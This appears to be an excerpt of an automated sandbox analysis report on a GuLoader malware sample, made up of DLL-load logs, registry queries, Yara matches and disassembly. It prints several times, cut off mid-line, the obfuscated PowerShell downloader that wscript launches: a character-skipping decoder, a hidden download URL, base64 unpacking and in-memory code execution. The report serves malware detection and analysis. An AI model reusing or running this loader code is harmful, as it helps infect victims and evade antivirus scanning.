Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\verclsid.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000007.00000002.1692631660.00000000075DF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb!N source: powershell.exe, 00000007.00000002.1698328991.0000000008448000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2083611363.000000002401E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.Core.pdbE source: powershell.exe, 00000007.00000002.1660415400.0000000002FDD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2083611363.000000002401E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB source: powershell.exe, 00000007.00000002.1692631660.00000000075DF000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("powershell " <#Hjemmebagerier Semicontradiction Anelser Raadgivningsvirksomheds #>;$Amtskonger='Galopperende';<#L", "0")

Yara detected GuLoader

Source: Yara match	File source: 00000007.00000002.1700261011.000000000BB86000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1700021777.0000000008960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1681206300.0000000005B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1506470995.000001BDA3983000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Sanfedeistiske)$GLoBaL:TaAgEbankEr = [SystEM.texT.eNCOdINg]::asCiI.gETsTRIng($pLaneRInG)$GlObal:skIS=$tAagEbAnKER.suBstriNg($AVLsDYr,$floneL)<#Talkierne Brles Stalkless Royalmast Kli
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Gibbet $Sankthansdage $Dikotomier), (Manuary @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Chromosomic = [AppDomain]::CurrentDomain.GetAssemblies()$globa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Mlea)), $Alacranarkedes170).DefineDynamicModule($Sinopite, $false).DefineType($mantappeaux, $Snksmedede, [System.MulticastDelegate])$A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Sanfedeistiske)$GLoBaL:TaAgEbankEr = [SystEM.texT.eNCOdINg]::asCiI.gETsTRIng($pLaneRInG)$GlObal:skIS=$tAagEbAnKER.suBstriNg($AVLsDYr,$floneL)<#Talkierne Brles Stalkless Royalmast Kli

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjemmebagerier Semicontradiction Anelser Raadgivningsvirksomheds #>;$Amtskonger='Galopperende';<#Lgknoldet Squiddle Hypozeuxis Prkeners #>;$Klasselotteriernes=$Argand+$host.UI;If ($Klasselotteriernes) {$Spionkamera++;}function Wirepullers($Whiniest){$Hyperscrupulous=$Synchronizable+$Whiniest.'Length'-$Spionkamera; for( $Alvearies210=4;$Alvearies210 -lt $Hyperscrupulous;$Alvearies210+=5){$Paasyningens++;$Fideikommiserne+=$Whiniest[$Alvearies210];$Milanesisk='Besprinkles';}$Fideikommiserne;}function Baggrundsfarve102($Effektivere){ . ($Schoolgirlism) ($Effektivere);}$Cedertrs=Wirepullers 'UnquMPigho Ef z,keai HanlMasklflueaQuer/ C,n ';$Cedertrs+=Wirepullers 'Simu5Saa..Inte0Pat. odou(Pe pWN,uri P.onAnded,ratoSpurwHy ds .de fedeNJenkTGavm Fold1Dig 0Buen.F.cu0 Fly;Urra ParaWBe iiI fonEs.e6Fris4Hver;Zyg Vidux unn6Mult4Svul;Iiis CnidrPretvYode:F.mi1Unsc3H,an1Duff.Stup0stjd) Geo Str.GAnkeet,enc StokTideoRing/ Sk 2 Nat0Svi.1Prop0Rub,0Hypa1 Ku 0Back1Sla OplaFForuiSterrPateeknu,fElisoDemoxfr m/Endu1Nuth3Ucsu1Comp.Ek p0 El, ';$Pladevenderne=Wirepullers 'Imm UGenls MicE HesRb,ma-NdtraCitrGusure Ko NParaTU,pr ';$Dekagrammet=Wirepullers 'Unphh EfttR,fetThorp plsvari: Kon/Spli/CanupBalerOmsloHelimCa aeInstnFinatBaadeCeylrKrum. R irTimesKvar/ MaaD Disi fgapnoyaoHus dPar,iBetadB li.SkvhpAflnfP.anmBelo ';$Forslagenes37=Wirepullers ' ste>Se p ';$Schoolgirlism=Wirepullers ' ChiiBukoePrutX.riz ';$almengr='Bredendes';$Effektfuldes146='\Stderes.Ide';Baggrundsfarve102 (Wirepullers ' nsa$FromG Ny LB.flo,arrBG staInfelTeks: amacHopehmun aphysI onRGentlsveji KroFBl kTProc=regi$Pr,dEProtNRa gv Udk: ShaaStatp ecaPMav D S.gAFrokt K iASubt+Per,$KardeLiddfUns FDiffELng.KBostTUncoFSl kUSkydLBou.dT aneNondsNoto1Felt4M re6Sera ');Baggrundsfarve102 (Wirepullers ' Shi$ButlGVestlSupeoVerdBUrsta PrelBoom:Blgecvivao Hexw,ageATrylGoutbEComp=Su v$Grild Pr eVeneKFjenacruigSig,RzygoAH.anmPopumUntee U mtT,ls.Frems antpAstrLSortIUnvotSyrm(Byge$StatfKvivO MetRUn.wsZelolBoylAHallG SalES senw beeTjekSChae3Conf7Temp)Sovs ');Baggrundsfarve102 (Wirepullers 'Blnd[mononKommEDy.aTIne .LedeS NorEUncoRSkndv PotICurrCForgEPseupcytooAflbiSpannSp,ntB abmIngeaUnbeN PokANakeGStile aurrSmok]Infi:plec:EquisTandE.ngecV,diUCyliR ChaIApplTTilsYAminP Urkrstiko VerTDeltODemic,olyoAlliLFrie K or=Lill Thu[ Endn A.cE Mu tSing.Spi,S,frie Ya CLsegUForsR W ni racTHalvY SynPHhv rfudgoBurrtLandoi tecSch,oHydrL,peet G nYhercpTricEDo,a]D ne:Van :aflytMr,el FnisAtte1 ,er2Unde ');$Dekagrammet=$Cowage[0];$Metrernes=(Wirepullers ' Ned$Va.dgDr mLP ago agsb DadAkinolOb i: KraEWhipDD ruIAid TBullePokerhe,veF,isS oxe= Geon deleUnplW C m-NyopoUn.xb OpsjNon eUncoCSpanT kuf H emS IndySpilSStiftSokkeRonnm skl.Vi iN,hooeGo dt Sej.Forhw PekEReawbR viCPhallSev,IGruseLew nMonsTFour ');Baggrundsfarve102 ($Metrernes);Baggrundsfarve102 (Wirepullers 'Damm$VoltEParadGsteiSkintDuraePinwrHa re OrcsAars. De.HM,dveMan aDi
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hjemmebagerier Semicontradiction Anelser Raadgivningsvirksomheds #>;$Amtskonger='Galopperende';<#Lgknoldet Squiddle Hypozeuxis Prkeners #>;$Klasselotteriernes=$Argand+$host.UI;If ($Klasselotteriernes) {$Spionkamera++;}function Wirepullers($Whiniest){$Hyperscrupulous=$Synchronizable+$Whiniest.'Length'-$Spionkamera; for( $Alvearies210=4;$Alvearies210 -lt $Hyperscrupulous;$Alvearies210+=5){$Paasyningens++;$Fideikommiserne+=$Whiniest[$Alvearies210];$Milanesisk='Besprinkles';}$Fideikommiserne;}function Baggrundsfarve102($Effektivere){ . ($Schoolgirlism) ($Effektivere);}$Cedertrs=Wirepullers 'UnquMPigho Ef z,keai HanlMasklflueaQuer/ C,n ';$Cedertrs+=Wirepullers 'Simu5Saa..Inte0Pat. odou(Pe pWN,uri P.onAnded,ratoSpurwHy ds .de fedeNJenkTGavm Fold1Dig 0Buen.F.cu0 Fly;Urra ParaWBe iiI fonEs.e6Fris4Hver;Zyg Vidux unn6Mult4Svul;Iiis CnidrPretvYode:F.mi1Unsc3H,an1Duff.Stup0stjd) Geo Str.GAnkeet,enc StokTideoRing/ Sk 2 Nat0Svi.1Prop0Rub,0Hypa1 Ku 0Back1Sla OplaFForuiSterrPateeknu,fElisoDemoxfr m/Endu1Nuth3Ucsu1Comp.Ek p0 El, ';$Pladevenderne=Wirepullers 'Imm UGenls MicE HesRb,ma-NdtraCitrGusure Ko NParaTU,pr ';$Dekagrammet=Wirepullers 'Unphh EfttR,fetThorp plsvari: Kon/Spli/CanupBalerOmsloHelimCa aeInstnFinatBaadeCeylrKrum. R irTimesKvar/ MaaD Disi fgapnoyaoHus dPar,iBetadB li.SkvhpAflnfP.anmBelo ';$Forslagenes37=Wirepullers ' ste>Se p ';$Schoolgirlism=Wirepullers ' ChiiBukoePrutX.riz ';$almengr='Bredendes';$Effektfuldes146='\Stderes.Ide';Baggrundsfarve102 (Wirepullers ' nsa$FromG Ny LB.flo,arrBG staInfelTeks: amacHopehmun aphysI onRGentlsveji KroFBl kTProc=regi$Pr,dEProtNRa gv Udk: ShaaStatp ecaPMav D S.gAFrokt K iASubt+Per,$KardeLiddfUns FDiffELng.KBostTUncoFSl kUSkydLBou.dT aneNondsNoto1Felt4M re6Sera ');Baggrundsfarve102 (Wirepullers ' Shi$ButlGVestlSupeoVerdBUrsta PrelBoom:Blgecvivao Hexw,ageATrylGoutbEComp=Su v$Grild Pr eVeneKFjenacruigSig,RzygoAH.anmPopumUntee U mtT,ls.Frems antpAstrLSortIUnvotSyrm(Byge$StatfKvivO MetRUn.wsZelolBoylAHallG SalES senw beeTjekSChae3Conf7Temp)Sovs ');Baggrundsfarve102 (Wirepullers 'Blnd[mononKommEDy.aTIne .LedeS NorEUncoRSkndv PotICurrCForgEPseupcytooAflbiSpannSp,ntB abmIngeaUnbeN PokANakeGStile aurrSmok]Infi:plec:EquisTandE.ngecV,diUCyliR ChaIApplTTilsYAminP Urkrstiko VerTDeltODemic,olyoAlliLFrie K or=Lill Thu[ Endn A.cE Mu tSing.Spi,S,frie Ya CLsegUForsR W ni racTHalvY SynPHhv rfudgoBurrtLandoi tecSch,oHydrL,peet G nYhercpTricEDo,a]D ne:Van :aflytMr,el FnisAtte1 ,er2Unde ');$Dekagrammet=$Cowage[0];$Metrernes=(Wirepullers ' Ned$Va.dgDr mLP ago agsb DadAkinolOb i: KraEWhipDD ruIAid TBullePokerhe,veF,isS oxe= Geon deleUnplW C m-NyopoUn.xb OpsjNon eUncoCSpanT kuf H emS IndySpilSStiftSokkeRonnm skl.Vi iN,hooeGo dt Sej.Forhw PekEReawbR viCPhallSev,IGruseLew nMonsTFour ');Baggrundsfarve102 ($Metrernes);Baggrundsfarve102 (Wirepullers 'Damm$VoltEParadGsteiSkintDuraePinwrHa re OrcsAars. De.HM,dveMan aDi
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjemmebagerier Semicontradiction Anelser Raadgivningsvirksomheds #>;$Amtskonger='Galopperende';<#Lgknoldet Squiddle Hypozeuxis Prkeners #>;$Klasselotteriernes=$Argand+$host.UI;If ($Klasselotteriernes) {$Spionkamera++;}function Wirepullers($Whiniest){$Hyperscrupulous=$Synchronizable+$Whiniest.'Length'-$Spionkamera; for( $Alvearies210=4;$Alvearies210 -lt $Hyperscrupulous;$Alvearies210+=5){$Paasyningens++;$Fideikommiserne+=$Whiniest[$Alvearies210];$Milanesisk='Besprinkles';}$Fideikommiserne;}function Baggrundsfarve102($Effektivere){ . ($Schoolgirlism) ($Effektivere);}$Cedertrs=Wirepullers 'UnquMPigho Ef z,keai HanlMasklflueaQuer/ C,n ';$Cedertrs+=Wirepullers 'Simu5Saa..Inte0Pat. odou(Pe pWN,uri P.onAnded,ratoSpurwHy ds .de fedeNJenkTGavm Fold1Dig 0Buen.F.cu0 Fly;Urra ParaWBe iiI fonEs.e6Fris4Hver;Zyg Vidux unn6Mult4Svul;Iiis CnidrPretvYode:F.mi1Unsc3H,an1Duff.Stup0stjd) Geo Str.GAnkeet,enc StokTideoRing/ Sk 2 Nat0Svi.1Prop0Rub,0Hypa1 Ku 0Back1Sla OplaFForuiSterrPateeknu,fElisoDemoxfr m/Endu1Nuth3Ucsu1Comp.Ek p0 El, ';$Pladevenderne=Wirepullers 'Imm UGenls MicE HesRb,ma-NdtraCitrGusure Ko NParaTU,pr ';$Dekagrammet=Wirepullers 'Unphh EfttR,fetThorp plsvari: Kon/Spli/CanupBalerOmsloHelimCa aeInstnFinatBaadeCeylrKrum. R irTimesKvar/ MaaD Disi fgapnoyaoHus dPar,iBetadB li.SkvhpAflnfP.anmBelo ';$Forslagenes37=Wirepullers ' ste>Se p ';$Schoolgirlism=Wirepullers ' ChiiBukoePrutX.riz ';$almengr='Bredendes';$Effektfuldes146='\Stderes.Ide';Baggrundsfarve102 (Wirepullers ' nsa$FromG Ny LB.flo,arrBG staInfelTeks: amacHopehmun aphysI onRGentlsveji KroFBl kTProc=regi$Pr,dEProtNRa gv Udk: ShaaStatp ecaPMav D S.gAFrokt K iASubt+Per,$KardeLiddfUns FDiffELng.KBostTUncoFSl kUSkydLBou.dT aneNondsNoto1Felt4M re6Sera ');Baggrundsfarve102 (Wirepullers ' Shi$ButlGVestlSupeoVerdBUrsta PrelBoom:Blgecvivao Hexw,ageATrylGoutbEComp=Su v$Grild Pr eVeneKFjenacruigSig,RzygoAH.anmPopumUntee U mtT,ls.Frems antpAstrLSortIUnvotSyrm(Byge$StatfKvivO MetRUn.wsZelolBoylAHallG SalES senw beeTjekSChae3Conf7Temp)Sovs ');Baggrundsfarve102 (Wirepullers 'Blnd[mononKommEDy.aTIne .LedeS NorEUncoRSkndv PotICurrCForgEPseupcytooAflbiSpannSp,ntB abmIngeaUnbeN PokANakeGStile aurrSmok]Infi:plec:EquisTandE.ngecV,diUCyliR ChaIApplTTilsYAminP Urkrstiko VerTDeltODemic,olyoAlliLFrie K or=Lill Thu[ Endn A.cE Mu tSing.Spi,S,frie Ya CLsegUForsR W ni racTHalvY SynPHhv rfudgoBurrtLandoi tecSch,oHydrL,peet G nYhercpTricEDo,a]D ne:Van :aflytMr,el FnisAtte1 ,er2Unde ');$Dekagrammet=$Cowage[0];$Metrernes=(Wirepullers ' Ned$Va.dgDr mLP ago agsb DadAkinolOb i: KraEWhipDD ruIAid TBullePokerhe,veF,isS oxe= Geon deleUnplW C m-NyopoUn.xb OpsjNon eUncoCSpanT kuf H emS IndySpilSStiftSokkeRonnm skl.Vi iN,hooeGo dt Sej.Forhw PekEReawbR viCPhallSev,IGruseLew nMonsTFour ');Baggrundsfarve102 ($Metrernes);Baggrundsfarve102 (Wirepullers 'Damm$VoltEParadGsteiSkintDuraePinwrHa re OrcsAars. De.HM,dveMan aDi	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886C202FD push ds; iretd	5_2_00007FF886C203E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886C20C4B push ds; iretd	5_2_00007FF886C20C4A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886C21029 pushad ; iretd	5_2_00007FF886C2102A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886C20C34 push ds; iretd	5_2_00007FF886C20C4A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886CF53F3 push esi; iretd	5_2_00007FF886CF53FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886CF5399 push ebx; iretd	5_2_00007FF886CF53F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886CF04F3 push es; iretd	5_2_00007FF886CF055A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886CF63F8 pushad ; iretd	5_2_00007FF886CF63F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886CF71C6 push esi; retf	5_2_00007FF886CF71C7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886CF0DD9 push cs; iretd	5_2_00007FF886CF0E32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886CF0521 push es; iretd	5_2_00007FF886CF055A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886CF1D19 push ds; iretd	5_2_00007FF886CF1D1A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886CF46EB push cs; retf	5_2_00007FF886CF479F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886CF16E4 push ss; iretd	5_2_00007FF886CF16F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886CF56E5 push edi; iretd	5_2_00007FF886CF573A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886CF4694 push cs; retf	5_2_00007FF886CF479F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886CF5683 push esi; iretd	5_2_00007FF886CF568A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886CF56A9 push edi; iretd	5_2_00007FF886CF573A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886CF4E33 push ecx; iretd	5_2_00007FF886CF4E3A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04A2425D push ebx; ret	7_2_04A242DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04A236CD push ebx; iretd	7_2_04A236DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04A23717 pushad ; iretd	7_2_04A23751
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04A23273 push es; iretd	7_2_04A23277
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_092E2900 push edi; retf	7_2_092E2906
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_092E2710 push ss; ret	7_2_092E2712
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_092E3161 push esi; iretd	7_2_092E317C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_092E2973 push ss; ret	7_2_092E2A3A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_092E19A0 push ss; ret	7_2_092E19BE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_092E1D88 push FFFFFFC7h; iretd	7_2_092E1D8A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_092E4E29 push ss; ret	7_2_092E4E3A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_092E2A23 push ss; ret	7_2_092E2A3A

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
